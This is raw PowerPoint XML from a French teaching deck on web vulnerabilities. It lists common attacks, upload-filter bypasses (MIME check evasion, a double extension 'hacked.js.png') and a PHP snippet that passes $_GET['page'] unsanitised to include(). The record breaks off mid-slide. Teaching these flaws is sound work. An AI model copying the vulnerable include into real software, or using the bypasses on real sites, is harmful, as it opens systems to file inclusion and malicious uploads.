              <a:t>Force brute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection de code ou de fichier (url, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000"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fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (C/XSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jour zéro (0-day)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254FFCE1-27B5-4A4C-938E-3B8FFC622F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6696075" y="3097329"/>
            <a:ext cx="4442606" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="62000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La compromission de ressources -&gt; Défiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le vol de données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Manque à gagner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34571471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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La faille </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>upload</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D667FB9-2BCD-4AB8-81B0-A5F32760320F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1866037"/>
            <a:ext cx="8882869" cy="3570208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>faille </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> est une faille permettant d'uploader des fichiers avec une extension non autorisée, cette faille est due à la mauvaise configuration du script d'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ou à l'absence complète de sécurité. Celle-ci est généralement présente dans les scripts d'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> d'images. C'est une des failles les plus dangereuses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="22313F"/>
              </a:solidFill>
              <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="22313F"/>
              </a:solidFill>
              <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Contourner la vérification MIME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Double extension  :  hacked.js.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5509539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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="494729"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La faille </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C29AC828-4D29-49E9-9C8E-7F9A193BFD2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694601" y="2248994"/>
            <a:ext cx="5032663" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050">
              <a:alpha val="49000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cette fonctionnalité permet, comme son nom l’indique, d’inclure une page dans une autre , on l’utilise comme ceci :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4057159B-5347-4357-9E28-F6A02309EC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="3421735"/>
            <a:ext cx="4677496" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
              <a:lumOff val="5000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>])) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6272A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6272A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vérifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6272A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6272A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s'il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6272A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6272A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>existe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6272A4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> la variable _GET </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>default.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
